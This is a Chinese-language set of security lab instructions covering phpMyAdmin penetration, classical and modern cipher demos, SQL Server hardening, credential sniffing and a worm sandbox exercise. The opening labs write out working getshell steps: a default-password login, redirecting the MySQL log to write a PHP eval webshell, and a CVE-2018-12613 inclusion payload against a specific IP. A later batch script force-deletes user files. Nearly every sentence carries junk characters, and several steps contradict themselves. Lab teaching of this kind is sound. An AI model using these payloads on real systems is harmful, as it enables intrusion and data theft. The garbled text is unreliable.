1.1實(shí)驗(yàn): Web站點(diǎn)滲透測(cè)試(一)
實(shí)驗(yàn)難度: 困難
實(shí)驗(yàn)類別: 驗(yàn)證型烦衣、創(chuàng)新型
實(shí)驗(yàn)?zāi)康? 挖掘漏洞, 獲得該服務(wù)器權(quán)限疟丙。
實(shí)驗(yàn)內(nèi)容: 對(duì)目標(biāo)靶機(jī)進(jìn)行漏洞挖掘, 獲得服務(wù)器權(quán)限烁焙。是否還存在其他漏洞可以獲得服務(wù)器權(quán)限衣屏?
一宵蕉、實(shí)驗(yàn)準(zhǔn)備
1酝静、根據(jù)平臺(tái)提供的靶機(jī)網(wǎng)址訪問網(wǎng)站首頁, 首頁界面如下圖所示。
二羡玛、實(shí)驗(yàn)步驟
1别智、使用目錄掃描器, 對(duì)靶機(jī)站點(diǎn)進(jìn)行目錄掃描。發(fā)現(xiàn)目標(biāo)站點(diǎn)下存在phpmyadmin目錄以及一個(gè)info. php的文件稼稿。
2薄榛、訪問info.php文件之后, 發(fā)現(xiàn)其內(nèi)容為php探針。通過php探針的信息, 判斷出該站點(diǎn)使用phpstudy搭建, 因?yàn)槭褂胮hpstudy搭建的站點(diǎn)默認(rèn)存在該探針文件, 且獲得網(wǎng)站的絕對(duì)路徑為"C:AphpStudy/PHPTutorialwww"渺杉。
3蛇数、訪問phpmyadmin目錄, 使用phpstudy 中 mysql的默認(rèn)密碼(root/root)進(jìn)行登錄嘗試, 發(fā)現(xiàn)登錄成功。
4是越、因?yàn)橐詒oot權(quán)限登錄了phpmyadmin且在步驟2已經(jīng)通過php探針獲取到了網(wǎng)站的絕對(duì)路徑, 所以按下來可以嘗試?yán)萌罩疚募磉M(jìn)行 getshell.首先在sql處執(zhí)行"SHOW VARIABLES LIKE 'general%'”查看是否開啟日志功能以及日志文件的保存路徑。
5碌上、日志功能暫未開啟倚评。接下來分別執(zhí)行"set global general_log = "ON";”開啟mysql日志功能。
"set global general_log_file=' C://phpStudy//PHPTutorial//www//shell.php';”將日志文件的存儲(chǔ)路徑改為站點(diǎn)根目錄下的shell.php文件馏予。
6天梧、之后再執(zhí)行sql 語句"select '<?php @eval($_POST[1]);?>", 向日志文件中寫入php一句話木馬霞丧。
7呢岗、之后在瀏覽器中訪問mysql日志文件, shell.php, 看到如圖所示的界面表示shell寫入成功。
8蛹尝、使用蟻創(chuàng)對(duì)webshell 進(jìn)行連接后豫。
9、實(shí)驗(yàn)結(jié)束突那。
1.2實(shí)驗(yàn): Web站點(diǎn)滲透測(cè)試(二)
實(shí)驗(yàn)難度: 困難
實(shí)驗(yàn)類別: 驗(yàn)證型挫酿、創(chuàng)新型
實(shí)驗(yàn)?zāi)康? 挖掘漏洞, 獲得該服務(wù)器權(quán)限。
實(shí)驗(yàn)內(nèi)容: 對(duì)目標(biāo)靶機(jī)進(jìn)行漏洞挖掘, 獲得服務(wù)器權(quán)限愕难。是否還存在其他漏洞可以獲得服務(wù)器權(quán)限早龟?
一惫霸、實(shí)驗(yàn)準(zhǔn)備
1、根據(jù)平臺(tái)提供的靶機(jī)網(wǎng)址訪問網(wǎng)站首頁, 首頁界面如下圖所示葱弟。
二壹店、實(shí)驗(yàn)步驟
1、掃描目標(biāo)站點(diǎn)目錄, 發(fā)現(xiàn)存在"www.zip"文件和phpmyadmin目錄芝加。
2硅卢、下載"www.zip"文件, 解壓后發(fā)現(xiàn)為網(wǎng)址源代碼文件县好。
3差凹、打開config目錄下的database.php文件。找到數(shù)據(jù)庫連接的用戶名和密碼枉氮。
4制市、訪問網(wǎng)站的phpmyadmin目錄, 使用在源代碼中找到的數(shù)據(jù)庫用戶名和密碼進(jìn)行登錄嘗試抬旺。
5、登錄成功后, 發(fā)現(xiàn)phpmyadmin的版本為4.8.1, 這個(gè)版本的phpmyadmin存在任意文件包含湯洞(CVE-2018-12613), 參考內(nèi)容: https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-X-LFI-Exploit/祥楣。
6开财、利用CVE-2018-12613 進(jìn)行g(shù)etshell.在SQL語句執(zhí)行處執(zhí)行<?php file_put_contents('shell.php', '<误褪?php@eval(S_POST[1]): 责鳍?>');?> , 這句話的含義為向shell.php文件中寫入一句話木馬兽间。
7历葛、按F12通過瀏覽器獲取sessionID。
8嘀略、包含session文件恤溶,在phpmyadmin目錄下生成webshell文件。Payload如下:http://183.129.189.59:10076/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/ses sions/sess_[此處為步驟7獲取到的sessionID]
9帜羊、使用蟻劍對(duì)webshell 進(jìn)行連接咒程。連接成功后,可通過蟻劍對(duì)目標(biāo)網(wǎng)站的文件讼育、數(shù)據(jù)庫等進(jìn)行操作帐姻。
1.3實(shí)驗(yàn):信息安全經(jīng)典實(shí)例(一)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:驗(yàn)證型
實(shí)驗(yàn)?zāi)康?了解在FAT32文件系統(tǒng)的文件安全擦除原理和方法。
實(shí)驗(yàn)內(nèi)容:實(shí)現(xiàn)文件安全擦除奶段,利用finaldata實(shí)現(xiàn)文件的工具恢復(fù)饥瓷。
一、實(shí)驗(yàn)準(zhǔn)備
1忧饭、打開本地“遠(yuǎn)程桌面連接”工具扛伍,輸入IP地址,進(jìn)入遠(yuǎn)程登陸界面词裤,輸入賬號(hào)和密碼刺洒,進(jìn)入虛擬機(jī)鳖宾,遠(yuǎn)程桌面連接,如下圖所示逆航。
遠(yuǎn)程登錄鼎文。如下圖所示。
二因俐、實(shí)驗(yàn)步驟
1拇惋、打開桌面上的eclipse。
2抹剩、在左側(cè)項(xiàng)目中找到“凱撒”撑帖,找到并找到MyCaesar.java文件,如下圖所示澳眷。
3胡嘿、點(diǎn)擊eclipse的運(yùn)行按鈕,執(zhí)行MyCaesar.java程序钳踊。
4衷敌、在控制臺(tái)輸入1執(zhí)行加密,輸入2執(zhí)行解密拓瞪。這里我們輸入1缴罗,并按提示輸入需要加密的字符串。傳統(tǒng)的愷撒加密支持對(duì)英文字符的加解密祭埂。輸入后回車面氓,得到加密后的密文。如下圖所示蛆橡。
5侧但、如果需要繼續(xù)執(zhí)行程序,則輸入其他任意字符航罗,如果需要退出,則輸入0屁药。這里繼續(xù)執(zhí)行粥血,輸入1,并輸入2執(zhí)行解密程序酿箭。如下圖所示复亏。
6、輸入待解密的密文缭嫡,回車缔御。這里可輸入上一步加密得到的密文。如下圖所示妇蛀。
7耕突、輸入0退出程序笤成,實(shí)驗(yàn)完成。
1.4實(shí)驗(yàn):信息安全經(jīng)典實(shí)例(一)(設(shè)計(jì)型)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:設(shè)計(jì)型
實(shí)驗(yàn)?zāi)康模赫莆諓鹑雒艽a原理及實(shí)現(xiàn)方式眷茁。
實(shí)驗(yàn)內(nèi)容:執(zhí)行愷撒密碼的加解密程序炕泳。
一、實(shí)驗(yàn)準(zhǔn)備
1上祈、打開本地“遠(yuǎn)程桌面連接”工具培遵,輸入IP地址,進(jìn)入遠(yuǎn)程登陸界面登刺,輸入賬號(hào)和密碼籽腕,進(jìn)入虛擬機(jī)。遠(yuǎn)程桌面連接纸俭。
2皇耗、遠(yuǎn)程登錄。
二掉蔬、實(shí)驗(yàn)步驟
1廊宪、打開桌面上的Dev-C++。
2女轿、打開“C++_caesar”文件夾箭启,點(diǎn)擊main.cpp。如下圖所示蛉迹。
3傅寡、點(diǎn)擊Dev-C++的編譯運(yùn)行按鈕。按照控制臺(tái)提示輸入?yún)?shù)北救。如下圖所示荐操。
4、實(shí)驗(yàn)完成
1.5實(shí)驗(yàn):信息安全經(jīng)典實(shí)例(二)
實(shí)驗(yàn)難度:簡(jiǎn)單
實(shí)驗(yàn)類別:驗(yàn)證型
實(shí)驗(yàn)?zāi)康模赫莆站S吉尼亞多表代換密碼原理及實(shí)現(xiàn)方式珍策。
實(shí)驗(yàn)內(nèi)容:執(zhí)行維吉尼亞密碼的加解密程序托启。
一、實(shí)驗(yàn)準(zhǔn)備
1攘宙、打開本地“遠(yuǎn)程桌面連接”工具屯耸,輸入IP地址,進(jìn)入遠(yuǎn)程登陸界面蹭劈,輸入賬號(hào)和密碼疗绣,進(jìn)入虛擬機(jī)。遠(yuǎn)程桌面連接铺韧。
2多矮、遠(yuǎn)程登錄。
二哈打、實(shí)驗(yàn)步驟
1塔逃、打開桌面上的eclipse讯壶。
2、在左側(cè)項(xiàng)目中找到“Vigenera”患雏,找到并找到MyVigenera.java文件鹏溯,如下圖所示。
3淹仑、點(diǎn)擊eclipse的運(yùn)行按鈕丙挽,執(zhí)行MyCaesar.java程序。
4匀借、在控制臺(tái)輸入1執(zhí)行加密颜阐,輸入2執(zhí)行解密。這里我們輸入1吓肋,并按提示輸入需要加密的字符串凳怨。輸入密鑰字符串,密鑰長度需小于明文長度是鬼》粑瑁回車后獲得密文。如下圖所示均蜜。
5李剖、再次運(yùn)行MyVigenera.java程序,這次選擇解密輸入剛才加密得到的密文囤耳,已經(jīng)與剛才相同的密鑰篙顺,如下圖所示。
6充择、實(shí)驗(yàn)完成德玫。
1.6實(shí)驗(yàn):信息安全經(jīng)典實(shí)例(二)(設(shè)計(jì)型)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:設(shè)計(jì)型
實(shí)驗(yàn)?zāi)康模赫莆站S吉尼亞多表代換密碼原理及實(shí)現(xiàn)方式。
實(shí)驗(yàn)內(nèi)容:執(zhí)行維吉尼亞密碼的加解密程序椎麦。
一宰僧、實(shí)驗(yàn)準(zhǔn)備
1、打開本地“遠(yuǎn)程桌面連接”工具观挎,輸入IP地址撒桨,進(jìn)入遠(yuǎn)程登陸界面,輸入賬號(hào)和密碼键兜,進(jìn)入虛擬機(jī)。遠(yuǎn)程桌面連接穗泵。
2普气、遠(yuǎn)程登錄。
二佃延、實(shí)驗(yàn)步驟
1现诀、打開桌面上的eclipse夷磕。
2、打開“C++_Vigenera”文件夾仔沿,找到“in.txt”坐桩,在里面輸入待加密的明文。然后點(diǎn)擊Vigenera項(xiàng)目文件封锉,在Dev-C++中打開項(xiàng)目绵跷。如下圖所示。
3成福、點(diǎn)擊Dev-C++的編譯運(yùn)行按鈕碾局。按照控制臺(tái)提示輸入?yún)?shù)。如下圖所示奴艾。
4净当、在“C++_Vigenera”文件夾中找到“out.txt”,即為加密后的密文。
5蕴潦、如果需要解密像啼,在“in.txt”中寫入待解密的密文,運(yùn)行程序后潭苞,在“out.txt”中會(huì)生成解密后的明文忽冻。
6、實(shí)驗(yàn)結(jié)束萄传。
1.7實(shí)驗(yàn):信息安全經(jīng)典實(shí)例(三)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:驗(yàn)證型
實(shí)驗(yàn)?zāi)康模毫私釹M4密碼原理及實(shí)現(xiàn)方式甚颂,了解分組密碼的結(jié)構(gòu)。秀菱。
實(shí)驗(yàn)內(nèi)容:執(zhí)行SM4密碼的加解密程序振诬。
一、實(shí)驗(yàn)準(zhǔn)備
1衍菱、打開本地“遠(yuǎn)程桌面連接”工具赶么,輸入IP地址,進(jìn)入遠(yuǎn)程登陸界面脊串,輸入賬號(hào)和密碼辫呻,進(jìn)入虛擬機(jī)。遠(yuǎn)程桌面連接琼锋。
2放闺、遠(yuǎn)程登錄。
二缕坎、實(shí)驗(yàn)步驟
1怖侦、打開桌面上的eclipse。
2、在左側(cè)項(xiàng)目中找到SM4->com.hps.test->testmain.java匾寝。
3搬葬、點(diǎn)擊eclipse的運(yùn)行按鈕,執(zhí)行testmain.java程序艳悔。如下圖所示急凰。
4、實(shí)驗(yàn)完成猜年。
1.8實(shí)驗(yàn):信息安全經(jīng)典實(shí)例(三)(設(shè)計(jì)型)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:設(shè)計(jì)型
實(shí)驗(yàn)?zāi)康模毫私釹M4密碼原理及實(shí)現(xiàn)方式抡锈,了解分組密碼的結(jié)構(gòu)。码倦。
實(shí)驗(yàn)內(nèi)容:執(zhí)行SM4密碼的加解密程序企孩。
一、實(shí)驗(yàn)準(zhǔn)備
1袁稽、打開本地“遠(yuǎn)程桌面連接”工具勿璃,輸入IP地址,進(jìn)入遠(yuǎn)程登陸界面推汽,輸入賬號(hào)和密碼补疑,進(jìn)入虛擬機(jī)。遠(yuǎn)程桌面連接歹撒。
2莲组、遠(yuǎn)程登錄。
二暖夭、實(shí)驗(yàn)步驟
1锹杈、打開桌面上的Dev-C++。
2迈着、點(diǎn)擊File->Import->fromMSVisualC++project竭望,找到并找到AES.java文件,在彈窗中選擇VisualC++project裕菠,打開桌面上的“C++_SM4”文件夾中的“TestAESCipher.dsp”文件咬清,最后點(diǎn)擊“Import”如下圖所示。
3奴潘、點(diǎn)擊Dev-C++的編譯運(yùn)行按鈕旧烧。如下圖所示。
4画髓、實(shí)驗(yàn)完成掘剪。
1.9實(shí)驗(yàn):加解密編程(一)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:驗(yàn)證型
實(shí)驗(yàn)?zāi)康模赫莆誅ES密碼原理及實(shí)現(xiàn)方式。
實(shí)驗(yàn)內(nèi)容:執(zhí)行DES密碼的加解密程序奈虾。
一杖小、實(shí)驗(yàn)準(zhǔn)備
1肆汹、打開本地“遠(yuǎn)程桌面連接”工具,輸入IP地址予权,進(jìn)入遠(yuǎn)程登陸界面,輸入賬號(hào)和密碼浪册,進(jìn)入虛擬機(jī)扫腺。遠(yuǎn)程桌面連接。
2村象、遠(yuǎn)程登錄笆环。
二、實(shí)驗(yàn)步驟
1厚者、打開桌面上的eclipse躁劣。
2、在左側(cè)項(xiàng)目中找到“DES”库菲,找到并找到DES.java文件账忘。
3、點(diǎn)擊eclipse的運(yùn)行按鈕熙宇,執(zhí)行DES.java程序鳖擒。如下圖所示。
4烫止、實(shí)驗(yàn)完成
1.10實(shí)驗(yàn):加解密編程(一)(設(shè)計(jì)型)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:設(shè)計(jì)型
實(shí)驗(yàn)?zāi)康模赫莆誅ES密碼原理及實(shí)現(xiàn)方式蒋荚。
實(shí)驗(yàn)內(nèi)容:執(zhí)行DES密碼的加解密程序。
一馆蠕、實(shí)驗(yàn)準(zhǔn)備
1期升、打開本地“遠(yuǎn)程桌面連接”工具,輸入IP地址互躬,進(jìn)入遠(yuǎn)程登陸界面播赁,輸入賬號(hào)和密碼,進(jìn)入虛擬機(jī)吨铸。遠(yuǎn)程桌面連接行拢。
2、遠(yuǎn)程登錄诞吱。
二舟奠、實(shí)驗(yàn)步驟
1、打開桌面上的Dev-C++房维。
2沼瘫、點(diǎn)擊File->Import->fromMSVisualC++project,找到并找到AES.java文件咙俩,在彈窗中選擇VisualC++project耿戚,打開桌面上的“C++_DES”文件夾中的“TestAESCipher.dsp”文件湿故,最后點(diǎn)擊“Import”如下圖所示。
3膜蛔、點(diǎn)擊Dev-C++的編譯運(yùn)行按鈕坛猪。如下圖所示。
4皂股、實(shí)驗(yàn)完成墅茉。
1.11實(shí)驗(yàn):加解密編程(二)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:驗(yàn)證型
實(shí)驗(yàn)?zāi)康模赫莆誂ES密碼原理及實(shí)現(xiàn)方式。
實(shí)驗(yàn)內(nèi)容:執(zhí)行AES密碼的加解密程序呜呐。
一就斤、實(shí)驗(yàn)準(zhǔn)備
1、打開本地“遠(yuǎn)程桌面連接”工具蘑辑,輸入IP地址洋机,進(jìn)入遠(yuǎn)程登陸界面,輸入賬號(hào)和密碼洋魂,進(jìn)入虛擬機(jī)绷旗。遠(yuǎn)程桌面連接。
2忧设、遠(yuǎn)程登錄刁标。
二、實(shí)驗(yàn)步驟
1址晕、打開桌面上的eclipse膀懈。
2、在左側(cè)項(xiàng)目中找到“AES”谨垃,找到并找到AES.java文件启搂。
3、點(diǎn)擊eclipse的運(yùn)行按鈕刘陶,執(zhí)行AES.java程序胳赌。如下圖所示。
4匙隔、實(shí)驗(yàn)完成疑苫。
1.12實(shí)驗(yàn):加解密編程(二)(設(shè)計(jì)型)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:設(shè)計(jì)型
實(shí)驗(yàn)?zāi)康模赫莆誂ES密碼原理及實(shí)現(xiàn)方式。
實(shí)驗(yàn)內(nèi)容:執(zhí)行AES密碼的加解密程序纷责。
一捍掺、實(shí)驗(yàn)準(zhǔn)備
1、打開本地“遠(yuǎn)程桌面連接”工具再膳,輸入IP地址挺勿,進(jìn)入遠(yuǎn)程登陸界面缨伊,輸入賬號(hào)和密碼烟阐,進(jìn)入虛擬機(jī)砚嘴。遠(yuǎn)程桌面連接枚粘。
2、遠(yuǎn)程登錄蚊丐。
二熙参、實(shí)驗(yàn)步驟
1、打開桌面上的Dev-C++麦备。
2尊惰、點(diǎn)擊File->Import->fromMSVisualC++project,找到并找到AES.java文件泥兰,在彈窗中選擇VisualC++project,打開桌面上的“C++_AES”文件夾中的“TestAESCipher.dsp”文件题禀,最后點(diǎn)擊“Import”如下圖所示鞋诗。
3、點(diǎn)擊Dev-C++的編譯運(yùn)行按鈕迈嘹。如下圖所示削彬。
4、實(shí)驗(yàn)結(jié)束秀仲。
1.13實(shí)驗(yàn):加解密編程(三)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:驗(yàn)證型
實(shí)驗(yàn)?zāi)康模赫莆誖SA密碼原理及實(shí)現(xiàn)方式融痛。
實(shí)驗(yàn)內(nèi)容:執(zhí)行RSA密碼的加解密程序。
一神僵、實(shí)驗(yàn)準(zhǔn)備
1雁刷、打開本地“遠(yuǎn)程桌面連接”工具,輸入IP地址保礼,進(jìn)入遠(yuǎn)程登陸界面沛励,輸入賬號(hào)和密碼,進(jìn)入虛擬機(jī)炮障。遠(yuǎn)程桌面連接目派。
2、遠(yuǎn)程登錄胁赢。
二企蹭、實(shí)驗(yàn)步驟
1、打開桌面上的eclipse智末。
2谅摄、在左側(cè)項(xiàng)目中找到“RSA”,找到并找到RSA.java文件吹害。
3螟凭、點(diǎn)擊eclipse的運(yùn)行按鈕,執(zhí)行RSA.java程序它呀。如下圖所示螺男。
4棒厘、實(shí)驗(yàn)完成。
1.14實(shí)驗(yàn):加解密編程(三)(設(shè)計(jì)型)
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:設(shè)計(jì)型
實(shí)驗(yàn)?zāi)康模赫莆誖SA密碼原理及實(shí)現(xiàn)方式下隧。
實(shí)驗(yàn)內(nèi)容:執(zhí)行RSA密碼的加解密程序奢人。
一、實(shí)驗(yàn)準(zhǔn)備
1淆院、打開本地“遠(yuǎn)程桌面連接”工具何乎,輸入IP地址,進(jìn)入遠(yuǎn)程登陸界面土辩,輸入賬號(hào)和密碼支救,進(jìn)入虛擬機(jī)。遠(yuǎn)程桌面連接拷淘。
2各墨、遠(yuǎn)程登錄。
二启涯、實(shí)驗(yàn)步驟
1贬堵、打開桌面上的Dev-C++。
2结洼、打開“C++_RSA”文件夾黎做,打開“C++_rsa.cpp”,點(diǎn)擊編譯運(yùn)行按鈕。如下圖所示松忍。
3蒸殿、按照控制臺(tái)提示輸入?yún)?shù)。如下圖所示挽铁。
4伟桅、實(shí)驗(yàn)完成
1.15實(shí)驗(yàn):SQL Server安全設(shè)置(一)
實(shí)驗(yàn)難度:簡(jiǎn)單
實(shí)驗(yàn)類別:驗(yàn)證型
實(shí)驗(yàn)?zāi)康模赫莆张渲冒踩拿艽a策略。
實(shí)驗(yàn)內(nèi)容:對(duì)SQL Server 進(jìn)行安全的密碼策略配置叽掘,查看數(shù)據(jù)庫日志楣铁。
一、實(shí)驗(yàn)準(zhǔn)備
1更扁、打開本地“遠(yuǎn)程桌面連接”工具盖腕,輸入Windows 7虛擬機(jī)的IP地址,進(jìn)入遠(yuǎn)程登陸界面浓镜,輸入賬號(hào)和密碼溃列,進(jìn)入虛擬機(jī)。遠(yuǎn)程桌面連接膛薛,如下圖所示听隐。
2、遠(yuǎn)程登錄哄啄,如下圖所示雅任。
二风范、SQL Server安全加固
1、開始->所有程序->Microsoft SQL Server 2008 r2->SQL Server Management Studio沪么,打開SQL
Server 2008硼婿。使用Windows身份驗(yàn)證登錄。
2禽车、SQL Server數(shù)據(jù)庫的安全威脅寇漫。數(shù)據(jù)庫面臨著濫用過高權(quán)限、濫用合法權(quán)限殉摔、權(quán)限提升州胳、數(shù)據(jù)庫平臺(tái)漏洞、數(shù)據(jù)庫通信協(xié)議漏洞等威脅逸月。
3陋葡、常見的安全加固方式。
(1)密碼策略由于SQLServer不能更改sa用戶名稱彻采,也不能刪除這個(gè)超級(jí)用戶,所以捌归,必須對(duì)這個(gè)帳號(hào)進(jìn)行最強(qiáng)的保護(hù)肛响,包括使用一個(gè)非常強(qiáng)壯的密碼、最好不要在數(shù)據(jù)庫應(yīng)用中使用sa帳號(hào)而是新建立一個(gè)擁有與sa一樣權(quán)限的超級(jí)用戶來管理數(shù)據(jù)庫惜索、同時(shí)養(yǎng)成定期修改密碼的好習(xí)慣特笋。數(shù)據(jù)庫管理員應(yīng)該定期查看是否有不符合密碼要求的帳號(hào)。比如使用下面的SQL語句:
(2)數(shù)據(jù)庫日志的記錄審核數(shù)據(jù)庫登錄事件的“失敗和成功”巾兆,在實(shí)例屬性中選擇“安全性”猎物,將其中的審核級(jí)別選定為全部,這樣在數(shù)據(jù)庫系統(tǒng)和操作系統(tǒng)日志里面角塑,就詳細(xì)記錄了所有帳號(hào)的登錄事件蔫磨。
4、實(shí)驗(yàn)完成圃伶。
1.16實(shí)驗(yàn):SQL Server安全設(shè)置(二)
實(shí)驗(yàn)難度:簡(jiǎn)單
實(shí)驗(yàn)類別:驗(yàn)證型
實(shí)驗(yàn)?zāi)康模赫莆张渲冒踩馁~號(hào)策略堤如。
實(shí)驗(yàn)內(nèi)容:在SQL Server 上配置安全的賬號(hào)策略,管理 SQL Server 內(nèi)置存儲(chǔ)過程xp_cmdshell 控制系統(tǒng)窒朋, 數(shù)據(jù)庫備份與恢復(fù)搀罢。
一、實(shí)驗(yàn)?zāi)繕?biāo)
1侥猩、使用賬號(hào)策略并實(shí)現(xiàn)以下目標(biāo):
① 確保將“帳戶鎖定持續(xù)時(shí)間”設(shè)置為“15分鐘或更多分鐘”
② 確保將“帳戶鎖定閾值”設(shè)置為“10次或更少的無效登錄嘗試榔至,但不為0”3.確保將“重置帳戶鎖定計(jì)數(shù)器”設(shè)置為“15分鐘或更長時(shí)間”。
2欺劳、完成Xp_cmdshell配置.
3唧取、完成數(shù)據(jù)庫備份
二铅鲤、實(shí)驗(yàn)準(zhǔn)備
使用window下的遠(yuǎn)程桌面連接進(jìn)行連接靶機(jī)。
連接完成后打開sqlservermanagementstudio使用windows身份驗(yàn)證登錄兵怯。
三彩匕、實(shí)驗(yàn)步驟
1、賬號(hào)策略
打開控制面板——>管理工具——>本地安全策略
選擇賬戶策略中的賬戶鎖定策略并雙擊賬戶鎖定閾值
輸入賬戶鎖定閾值
設(shè)置鎖定時(shí)間和計(jì)數(shù)器
回到sqlservermanagementstudio中選擇新建登錄名
輸入登錄名和密碼媒区,勾選強(qiáng)制實(shí)施密碼策略和強(qiáng)制密碼過期
退出sqlservermanagementstudio并重新打開
使用錯(cuò)誤的密碼嘗試五遍驼仪,再使用正確的密碼。
說明賬號(hào)安全策略已經(jīng)實(shí)現(xiàn)袜漩,因?yàn)閟ql2008是應(yīng)用windows下的安全策略绪爸,所以只需要設(shè)置Windows下的安全策略
注:要想解除鎖定,重新使用windows身份驗(yàn)證登錄查看該登錄名的屬性狀態(tài)欄宙攻,修改鎖定選項(xiàng)即可奠货。
2、配置Xp_cmdshell
右鍵點(diǎn)擊連接后數(shù)據(jù)庫的最上方座掘,選擇“方面”递惋。
選擇外圍應(yīng)用配置器
將XPCmdShellEnabled選項(xiàng)修改為True
3、Sqlserver數(shù)據(jù)庫備份
(1)數(shù)據(jù)庫整庫備份右鍵數(shù)據(jù)庫點(diǎn)擊任務(wù)下的備份
選擇路徑并填入相應(yīng)參數(shù)點(diǎn)擊確定即可
備份成功彈出提示框
(2)通過生成腳本的方式單表備份右鍵數(shù)據(jù)庫點(diǎn)擊任務(wù)下的生成腳本
點(diǎn)擊下一步溢陪,可以選擇特定的對(duì)象或者生成整個(gè)數(shù)據(jù)庫腳本
選擇生成文件的形式以及保存的目錄萍虽,如果想同時(shí)保存數(shù)據(jù),點(diǎn)擊高級(jí)進(jìn)行設(shè)置
(3)通過Select Into語句將一個(gè)表快速備份到一個(gè)臨時(shí)新表中形真。使用以下語句即可杉编。
Select * Into ABackUp.dbo.Product_0228 FROM A.dbo.Product;
1.17實(shí)驗(yàn):FTP密碼嗅探
實(shí)驗(yàn)難度:簡(jiǎn)單
實(shí)驗(yàn)類別:驗(yàn)證型
實(shí)驗(yàn)?zāi)康模盒崽紽TP登陸密碼咆霜。
實(shí)驗(yàn)內(nèi)容:獲取FTP帳戶密碼邓馒,主機(jī)B遠(yuǎn)程FTP登錄,分析捕獲數(shù)據(jù)包蛾坯。
一光酣、實(shí)驗(yàn)準(zhǔn)備
遠(yuǎn)程登陸windows攻擊機(jī)和靶機(jī)
二、實(shí)驗(yàn)步驟
登陸靶機(jī)開啟wireshark脉课,選擇本地連接開始抓包使用攻擊機(jī)上的winscp遠(yuǎn)程登陸靶機(jī)的FTP服務(wù)
在靶機(jī)上使用wireshark的過濾器過濾ftp挂疆,可以看到明文顯示的登陸情況
右鍵選擇追蹤流,tcp流下翎,可以看到完整的操作缤言。
1.18實(shí)驗(yàn):OE賬戶嗅探
實(shí)驗(yàn)難度:中等
實(shí)驗(yàn)類別:驗(yàn)證型
實(shí)驗(yàn)?zāi)康模和ㄟ^實(shí)驗(yàn)了解如何進(jìn)行OE賬戶嗅探。
實(shí)驗(yàn)內(nèi)容:通過抓包嗅探OE賬戶视事。
注意:由于實(shí)驗(yàn)環(huán)境特殊平臺(tái)暫不支持胆萧,所以僅提供郵件流量包進(jìn)行分析,以下抓取流量的過程不做要求操作,分析過程可直接使用提供流量包進(jìn)行分析
實(shí)驗(yàn)步驟
1.準(zhǔn)備一臺(tái)電子郵件服務(wù)器和一臺(tái)電子郵件客戶機(jī)
2.查看服務(wù)器與客戶機(jī)的IP地址
3.在服務(wù)器的pop3服務(wù)中新建一個(gè)test.com域
4.在域中添加兩個(gè)郵箱跌穗,用戶名分別為test1和test2订晌,密碼均為123123
5.在客戶機(jī)中打開outlook,添加賬戶test1與test2接收郵件服務(wù)器地址與發(fā)送郵件服務(wù)器地址都為服務(wù)器1的IP地址
6.在客戶機(jī)中使用賬戶test1向賬戶test2發(fā)送郵件
7.在客戶機(jī)中切換賬戶為test2進(jìn)行郵件接收蚌吸,并抓包
8.在切換至賬戶test2接收郵件時(shí)锈拨,客戶機(jī)向服務(wù)器發(fā)送了test2的郵箱與密碼用于登錄。
1.19實(shí)驗(yàn):批處理腳本編寫與驗(yàn)證蠕蟲病毒(一)
實(shí)驗(yàn)難度:簡(jiǎn)單
實(shí)驗(yàn)類別:驗(yàn)證型羹唠、創(chuàng)新型
實(shí)驗(yàn)?zāi)康模簩W(xué)習(xí)簡(jiǎn)單的批處理腳本編寫
實(shí)驗(yàn)內(nèi)容:編寫一個(gè)jxz.bat的批處理奕枢,有輸出用戶、網(wǎng)絡(luò)信息佩微、任務(wù)列表缝彬、刪除垃圾等功能。
請(qǐng)自行美化批處理的輸出結(jié)果哺眯?如何修改最后一步打開的網(wǎng)頁谷浅?
實(shí)驗(yàn)步驟
1、右鍵桌面新建一個(gè)文本文件奶卓。如下圖所示:
2一疯、右鍵修改名稱為jxz.bat。如下圖所示:
3夺姑、右鍵使用notpad++打開违施。如下圖所示:
4、按照如下代碼輸出:
@echo off
echo ------------------
net user
pause
echo ------------------
tasklist
pause
echo ------------------
ipconfig
pause
eoho ------------------
del /f /s /q %systemdrive %\*.tmp
del /f /s /q %systemdrive %\*._mp
del /f /s /q %systemdrive %\*.log
del /f /s /q %systemdrive %\*.gid
del /f /s /q %systemdrive %\*.chk
del /f /s /q %systemdrive %\*.old
del /f /s /q %systemdrive %\recycled\*.*
del /f /s /q %windir %\*.bak
del /f /s /q %windir %\prefetch\*.*
rd /s /q %windir %\temp & md %windir %\temp
del /f /q %userprofile %\cookies\*.*
del /f /q %userprofile %\recent\*.*
del /f /s /q “%userprofile %\Localsettings\Temporary Internet Files\*.*”
del /f /s /q “%userprofile %\Localsettings\Temp\*.*”
del /f /s /q “%userprofile %\recent\*.*”
pause
eaho ------------------
explorer https://www.baidu.com
pause
5瑟幕、保存文件。
6留潦、點(diǎn)擊Windows開始按鈕 只盹,輸入cmd,運(yùn)行命令窗口兔院。
7殖卑、輸入cd Desktop回車,切換目錄到桌面坊萝。如下圖所示:
8孵稽、輸入jxz.bat運(yùn)行腳本 ,等待完成十偶。如下圖所示:
9菩鲜、完成實(shí)驗(yàn)。
1.20實(shí)驗(yàn):批處理腳本編寫與驗(yàn)證蠕蟲病毒(二)
實(shí)驗(yàn)難度:簡(jiǎn)單
實(shí)驗(yàn)類別:驗(yàn)證型惦积、創(chuàng)新型
實(shí)驗(yàn)?zāi)康模候?yàn)證一種蠕蟲病毒的感染過程
實(shí)驗(yàn)內(nèi)容:運(yùn)行蠕蟲病毒查看行為特征接校,再利用殺毒軟件進(jìn)行殺毒
該蠕蟲病毒使用了什么樣的方式來欺騙人們?nèi)ミ\(yùn)行它?
病毒通過什么方式來達(dá)到隱藏自身的目的?
一狮崩、實(shí)驗(yàn)過程
1蛛勉、啟動(dòng)沙箱sandboxie鹿寻。如下圖所示:
2、將病毒的后綴名改成exe诽凌,并且 右鍵病毒在沙箱中運(yùn)行毡熏。如下圖所示:
3、觀察過程侣诵。如下圖所示:
